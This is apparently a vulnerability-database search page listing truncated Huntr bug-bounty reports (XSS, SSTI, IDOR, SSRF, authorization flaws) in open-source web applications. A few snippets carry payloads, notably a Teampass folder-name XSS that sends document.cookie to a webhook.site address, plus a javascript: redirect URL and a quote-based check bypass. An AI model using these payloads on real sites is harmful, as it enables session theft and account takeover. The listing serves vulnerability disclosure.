Lucene search
K

4072 matches found

Huntr
Huntr
added 2023/06/15 4:56 p.m.10 views

Stored XSS in the delete confirmation popup

Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept Step1: The user with the privilege to create group creates a new group by passing a payload into...

6.4AI score
Exploits0
Huntr
Huntr
added 2023/06/15 4:44 p.m.15 views

Server-Side Template Injection leads to Remote Code Execution

Description Admin or Staff with "Mass mailer" permission can perform a Server-Side Template Injection attack Proof of Concept Log in as an admin or a staff who has "Mass mailer" permission, edit a message In the "Email content" field, insert the following value and click "Update and preview" %...

5.8CVSS7.3AI score0.01034EPSS
Exploits1
Huntr
Huntr
added 2023/06/15 3:49 p.m.7 views

Leak Secret tokens by changing baseURL

Description nuxt-api-party allows developers to easily hook up APIs. You can configure API URLs and Credentials to be sent on requests. It is suggested in the documentation that this plugin is capable of handling sensitive data. There is a design flaw that could allow an attacker to extract priva...

6.7AI score
Exploits0
Huntr
Huntr
added 2023/06/15 3:47 p.m.8 views

Stored XSS on entire Client site

Description Admin or Staff with "System" permission can produce a store XSS on entire Client site Proof of Concept Edit the "Signature" field to this value "FOSSBilling.org - Client Management, Invoice and Support Software"" Then it will trigger in every Client screens Seems like it was rendered ...

6.2AI score
Exploits0
Huntr
Huntr
added 2023/06/15 1:57 p.m.9 views

The ability to edit groups owned by any user.

Description The edit group function does not check the owner, allowing for the possibility to modify a group without being the owner of that group. Proof of Concept Step 1: We have User1 who owns Group 1 and Group 2; User5 who owns Group 5. Step 2: User1 performs an edit group action and changes...

6.9AI score
Exploits0
Huntr
Huntr
added 2023/06/15 1:14 p.m.41 views

Desktop APP XSS to RCE

🔒️ Requirements The user must load the malicious configuration and click on the buttons. 📝 Description This exploitation relies on several issues which chained together lead to an RCE. In the following subsection, I will try to explain it as best I can. 💉 Not sanitized HTML injection In the...

7.5CVSS6.4AI score0.0194EPSS
Exploits1
Huntr
Huntr
added 2023/06/15 10:41 a.m.6 views

Improper Authorization leads to privilege escalation

Description The application improperly performs user authorization, resulting in a user with the user management role being able to modify their own permissions or those of others. Proof of Concept Step1: The highest-level administrator or an administrator with the permission to create roles...

6.7AI score
Exploits0
Huntr
Huntr
added 2023/06/15 10:10 a.m.7 views

Incorrect Authorization leads to delete user

Description The application is experiencing incorrect permission settings, leading to the user with user administration rights being able to delete anyone, including users who are not under their management authority. Proof of Concept Step1:The User Demo super admin creates a user admin with user...

6.7AI score
Exploits0
Huntr
Huntr
added 2023/06/14 8:40 p.m.17 views

Session Fixation Vulnerability

Description The application does not generate a new PHPSESSID cookie after the user authenticates successfully. A malicious user is able to create a new session cookie value and injects it to a victim pre-authenticaiton. After the victim logs in, the injected cookie becomes valid, giving the...

5.8CVSS6.7AI score0.00506EPSS
Exploits1
Huntr
Huntr
added 2023/06/14 6:28 p.m.10 views

The user can delete himself

Description Bypassing the conditional check leads to the user can delete himself. Proof of Concept Step 1: The user with id 18834 attempts to delete himself but encounter an error Step 2: By using userid=18834' instead of userid=18834, the user was able to successfully delete himself...

6.9AI score
Exploits0
Huntr
Huntr
added 2023/06/14 5:7 p.m.10 views

Able to change username that is by default unchangeable

Description The website receives input from the user that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified. Proof of Concept Step 1: We have a user with ID 18833 and the...

6.9AI score
Exploits0
Huntr
Huntr
added 2023/06/14 1:51 a.m.11 views

The app allows to set new password same as old password

Description 1/ Access and login to the demo website: https://demo.openitcockpit.io 2/ At changing password function, set new password as same as old password. 3/ Logout and re-login to check, it's successful. Proof of Concept Link video PoC:...

7.1AI score
Exploits0
Huntr
Huntr
added 2023/06/14 1:28 a.m.21 views

Sensitive Cookie Without Secure Flag

Description Access and login to the demo website: https://demo.openitcockpit.io/ Press F12 on your keyboard or right-click on the website to open dev-tool. At Application tab, choose Cookies and there are some sensitive cookies without Secure flag. CookieAuth, csrfToken Proof of Concept Link imag...

4.9CVSS6.8AI score0.00261EPSS
Exploits1
Huntr
Huntr
added 2023/06/14 1:20 a.m.12 views

Sensitive Cookie Without HttpOnly Flag

Description Access and login to the demo website: https://demo.openitcockpit.io/ Press F12 on your keyboard or right-click on the website to open dev-tool. At Application tab, choose Cookies and there is CookieAuth sensitive cookie without HttpOnly flag. Proof of Concept Link image evidence:...

6.9AI score
Exploits0
Huntr
Huntr
added 2023/06/13 9:33 a.m.24 views

heap-buffer-overflow in function id3dmx_flush filters/reframe_mp3.c

Description Heap-buffer-overflow in MP4Box. Version bash MP4Box - GPAC version 2.3-DEV-revrelease c 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC:...

1.7CVSS6.9AI score0.00398EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/12 8:34 p.m.32 views

Desktop APP RCE via saveDraft IPC

🔒️ Requirements The user must load a malicious project. 📝 Description In version 20.3.3 commit 5383c20e947fd772668316e407edc5d5db4850db, the shell=true option is added to a spawn execution. This is really dangerous has it allows a malicious user to execute commands even from attributes. Example: j...

7.5CVSS7.1AI score0.01069EPSS
Exploits0
Huntr
Huntr
added 2023/06/12 5:46 p.m.15 views

XSS Filter Bypass in Folder Name leading to Information Disclosure

Description Proof of Concept First, login to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...

4.9CVSS6.6AI score0.00468EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/12 8:5 a.m.27 views

Local file read through %load_json

Description When ALLOWPLANTUMLINCLUDE is set to false the default settings in the online server, !include processing is turned off, preventing local files from being read. However, other features like %loadjson can still access local files. Since many people will run plantuml-server in its defaul...

5CVSS6.8AI score0.00866EPSS
Exploits1
Huntr
Huntr
added 2023/06/12 6:25 a.m.17 views

URL Restriction Bypass

Description In attempting to fix a previous issue, the PATTERNUSERINFO regular expression was changed. This change introduced another way to bypass the URL allowlist by introducing non-alphanumeric characters into the user information part of the URL. Proof of Concept Run PlantUML with...

6.4CVSS6.6AI score0.0087EPSS
Exploits1
Huntr
Huntr
added 2023/06/11 8:40 a.m.17 views

IDOR in message deletion

Description user can delete others's message. we know the report https://huntr.dev/bounties/24ae402f-220f-41c6-962e-47c26938986e/ , but we find that we do not fix one case. Proof of Concept 1 user1 send admin a greeting card1 2 user2 send admin a greeting card2 3 user1 delete his message related ...

5.5CVSS7AI score0.00415EPSS
Exploits1
Huntr
Huntr
added 2023/06/11 8:20 a.m.17 views

Users can order Add-Ons Separately

Description I find a requirement that addons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the...

3.5CVSS6.8AI score0.00476EPSS
Exploits1
Huntr
Huntr
added 2023/06/10 5:31 p.m.30 views

Directory listing in multiple endpoints

Description Teampass has directory listing by default for various endpoints that eventually discloses application-specific and user data and files. Proof of Concept Visit the following endpoint without logging in to the application. Sensitive - https://127.0.0.1/includes configs -...

5CVSS6.7AI score0.00704EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/10 5:5 p.m.18 views

Stored XSS via Default session expiration time

Description The Default session expiration time feature when submitted HTML/JS tags executes the code in the login page. Proof of Concept Login to Teampass and go to Settings = Options. http://127.0.0.1/index.php?page=options In theDefault session expiration time input field insert an XSS payload...

4.9CVSS6.4AI score0.00526EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/10 6:35 a.m.22 views

Downloadable product type lacks order status check

Description There is a vulnerability in fossbilling where upgrading non-active orders is prevented, but it is possible to still do so through the upgrade API...

5CVSS6.8AI score0.00407EPSS
Exploits1
Huntr
Huntr
added 2023/06/09 11:33 p.m.11 views

Privilege Escalation Vulnerability in Product Upgrade Module

Description Our product upgrade module contained a privilege escalation vulnerability that would allow an unauthorized user to upgrade to a product they were not authorized to. After an administrator had Product 1 can upgrde as Product2 , but not Product3, a user could use Burpsuite to intercept...

7.1AI score
Exploits0
Huntr
Huntr
added 2023/06/09 4:16 p.m.17 views

Security vulnerability in product bundling feature

Description Our e-commerce platform offers a bundled sales promotion feature, allowing an administrator to bind the sale of a product to an addon. However, we have identified a security vulnerability that exists in this feature. After an administrator cancels a bundle offer, users can still make...

3.5CVSS6.8AI score0.00407EPSS
Exploits1
Huntr
Huntr
added 2023/06/09 9:0 a.m.4 views

Serious Security Vulnerability Discovered in Promotion

Description I am writing to report a serious security vulnerability that we have uncovered. Specifically, we have found that promotions applied to certain client groups are still being honored even after the promotions are no longer applicable to those groups. This means that attackers can...

7AI score
Exploits0
Huntr
Huntr
added 2023/06/09 8:32 a.m.18 views

we still can order the product even it is disabled

Description I am writing to report a potential security vulnerability that was uncovered in your platform. Specifically, we discovered that your product purchase functionality can still be accessed via API even after the product has been disabled and is no longer available for sale. Proof of...

4CVSS6.8AI score0.00509EPSS
Exploits1
Huntr
Huntr
added 2023/06/09 7:51 a.m.14 views

Stored XSS in Survey Groups Function

Description By Injecting the payloads to the fields Title, Description, users who visited "Survey list" screen maybe compromises Proof of Concept Step 1: Login as Administrator, go to the "Survey list" screen function, click "create survey group" button. Step 2: Inject the payload to the fields...

6.9AI score
Exploits0
Huntr
Huntr
added 2023/06/08 6:35 p.m.14 views

Stored XSS vulnerability

Description The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Proof of Concept 1 Step1: The user has the right to access and perform the creation of surveys, with the payload...

6.8AI score
Exploits0
Huntr
Huntr
added 2023/06/07 1:13 p.m.45 views

Unauthenticated Blind SSRF

Description The Oxeye research team found Owncast vulnerable to an Unauthenticated Blind SSRF vulnerability. This vulnerability may allow an unauthenticated attacker to force the Owncast server to send HTTP requests to arbitrary locations using the GET HTTP method. This vulnerability also allows...

6.4CVSS7.5AI score0.01356EPSS
Exploits1
Huntr
Huntr
added 2023/06/07 7:33 a.m.31 views

Open Redirect on follow/unfollow user's profile action

Description The idea is similar to CVE-2022-1058 https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d/ . Browsers interpreted \example.com - https://example.com and lead to open redirect Proof of Concept The vulnerable API is lie in follow/unfollow action on user's profile. In order to...

3.6CVSS6.8AI score0.53177EPSS
Exploits2References1
Huntr
Huntr
added 2023/06/06 3:44 p.m.26 views

Formula Injection vulnerability in CSV export feature

Description The admidio application is vulnerable to Formula Injection/CSV injection via the Firstname, Lastname input fields. These vulnerabilities allow unauthenticated attackers to execute arbitrary code via a a crafted excel file. Proof of Concept 1. Create a member with role Associations boa...

4.4CVSS8.3AI score0.01679EPSS
Exploits4References4
Huntr
Huntr
added 2023/06/06 9:29 a.m.17 views

Stored XSS via file upload in FireFox

Description Upload html file containing XSS payload. Payload ' On opening and refreshing the page, XSS payload executes in Firefox. Proof of Concept https://drive.google.com/file/d/1Irkg0u-8DcEizRSN3xE87ezEWmp0L4j/view?usp=sharing...

6.4AI score
Exploits0References1
Huntr
Huntr
added 2023/06/06 6:51 a.m.21 views

HTML Injection in Folder Name

Description The folder name does not sanitize folder name and due to missing output encoding, HTML user-input is rendered in the webpage during folder deletion. Proof of Concept 1. Login to Teampass as any user. 2. Go to Folders tab. 3. Create a new folder with HTML tag in the Label. Example: HTM...

4.9CVSS6.9AI score0.00522EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/05 8:52 a.m.15 views

IDOR can make attackers add or close others' unavaiable

both user1 and user2 are Providers 1 user1 login and add unavaiable 2 request can be like POST /index.php/backendapi/ajaxsaveunavailable HTTP/1.1...

4CVSS7AI score0.00374EPSS
Exploits1
Huntr
Huntr
added 2023/06/05 6:7 a.m.17 views

we can still send the photo as greeting card even the albums is locked

1 admin create a album and upload a photo 2 member-1 login and send the photo as greeting card to member-2 3 member-1 use burpsuite hijack the request, which can be like POST /admprogram/modules/ecards/ecardsend.php HTTP/1.1...

3.5CVSS6.9AI score0.00416EPSS
Exploits1
Huntr
Huntr
added 2023/06/04 3:3 p.m.23 views

Stored XSS in many configuration fields

Description Paste the XSS payload into the configuration fields. And I think there are many fields to configure that can be vulnerable to Stored XSS vulnerabilities, such as configuration fields in Options, MFA, API, Emails,... hope you check it too. Proof of Concept...

4.9CVSS6.1AI score0.00537EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/04 1:20 p.m.18 views

Create multiple user with the same username (Race Condition)

Description Administrator users can create multiple users with the same username which breaks the logic of the web application. Proof of Concept Step 1: At AdministrationUser ManagementManager User Screen, click on "New Local User" button Step 2: Fill in all the required fields, notice that the...

1.7CVSS6.9AI score0.00475EPSS
Exploits1
Huntr
Huntr
added 2023/06/03 10:45 p.m.12 views

HTML Injection / Possible XSS

Description In pimcore I was able to identify a Unauthenticated HTML Injection / XSS Possible. Conditions: 2 factor authentication must not set before Vulnerable Endpoint: http://localhost/admin/login/2fa-setup Vulnerable Param: error= How it works, So basically any admin, who has not setup 2...

7.5AI score
Exploits0References1
Huntr
Huntr
added 2023/06/03 8:39 p.m.26 views

CSRF on /api/graphql query executing the mutations through GET requests

Description Mutations are saveRecord or createProcess queries used in Graphql. SuiteCRM prevents CSRF in this functionality by sending a POST request with a X-Xsrf-Token header. the bug here is that, when we send a GET request, the backend does not expect the X-Xsrf-Token header. Using this, an...

6.8CVSS6.9AI score0.00302EPSS
Exploits1References3
Huntr
Huntr
added 2023/06/02 4:5 p.m.17 views

Stored XSS on user's name

Description Paste the payload XSS into the Name or Last name field. XSS vulnerability will trigger. Proof of Concept https://drive.google.com/file/d/1hoZkCxzTQbcIDy28hKJyjyrOD1Pcaaz0/view?usp=sharing...

4.9CVSS6.4AI score0.00738EPSS
Exploits1References1
Huntr
Huntr
added 2023/05/31 10:25 a.m.21 views

The web app does not verify weak password at backend

Description Access and login to the demo website: https://cloudexplorer-lite-demo.fit2cloud.com/ At changing password function, the backend does not verify weak passwords so that user can do: 1/ Set new password as same as old password. 2/ Set new password by one character, such as 1. This case c...

6.5CVSS7.1AI score0.0078EPSS
Exploits1
Huntr
Huntr
added 2023/05/30 9:10 a.m.15 views

missing permission check for API /setting/workspace/member/update

Proof of Concept 1 user1 是workspace1的空间管理员 2 user2 是workspace1的成员 3 user1 更新user2的信息,比如将其更新为空间管理员 4 使用burpsuite拦截请求 POST /setting/workspace/member/update HTTP/1.1 Host: 192.168.213.128:8081 Content-Length: 144 Accept-Language: zh-CN WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7 User-Agent:...

6.5CVSS7AI score0.00589EPSS
Exploits1
Huntr
Huntr
added 2023/05/30 3:24 a.m.9 views

Stored XSS in End page

Description Allows a user who only has the authority to create surveys not the administrator to bypass validation and embed javascript schemes when creating surveys Step to reproduce - Login as administrator 1. Open User management and Create a user with create surveys only permissions. 1. Logout...

6.9AI score
Exploits0
Huntr
Huntr
added 2023/05/29 4:23 p.m.24 views

OOB read from unchecked return

Environment bash Distributor ID: Debian Description: Debian GNU/Linux bookworm/sid Version I checked against the latest release as of 05/29/23 the current master branch at commit 4f810869b06b5d7b0cb73d166864dfb4b1e900f6 . Description This AddressSanitizer output is indicating a read on an unknown...

3.2CVSS6.9AI score0.00306EPSS
Exploits1
Huntr
Huntr
added 2023/05/29 9:35 a.m.25 views

DOM Cross Site Scripting and openredirect

Vulnerable Endpoint: https://demo.saleor.io/default-channel/en-US/account/login/?next=javascript:alert1 Description: 1. Hello team, Recently i found that, on saleor React storefront dashboard there is a DOM XSS and open-redirect vulnerability Steps to reproduce XSS: 1. Go to the above mentioned...

5.8CVSS6.3AI score0.00459EPSS
Exploits1
Huntr
Huntr
added 2023/05/29 7:8 a.m.17 views

Cross-Site Scripting (Stored XSS)

Description With Association's board role, i can add a new web link. But, when i create a link, in Link name input field can insert an onfocus/autofocus attribute because do not processing for double quote. Proof of Concept 1. Login by account with Association's board role 2. Access funtion Web...

4.9CVSS6.3AI score0.00479EPSS
Exploits1
Huntr
Huntr
added 2023/05/28 11:48 a.m.15 views

Improper Authorization in "Customer automation rules" function

Description The product performs authorization checks incorrectly when an unauthorized actor tries to access a resource or perform an actions. Proof of Concept The user does not have permission to delete the rule. Location - GET /admin/customermanagementframework/rules/list - POST...

6.4CVSS6.7AI score0.00444EPSS
Exploits1
Huntr
Huntr
added 2023/05/27 3:26 p.m.11 views

Integer Overflow in tjexample.c

Description The tjexample.c example program uses tjAlloc function to allocate the output buffer of the JPEG buffer. tjAlloc uses malloc which takes a sizet number of bytes an unsigned integer. However, tjAlloc itself takes the number of bytes as a signed integer:...

7.2AI score
Exploits0
Total number of security vulnerabilities4072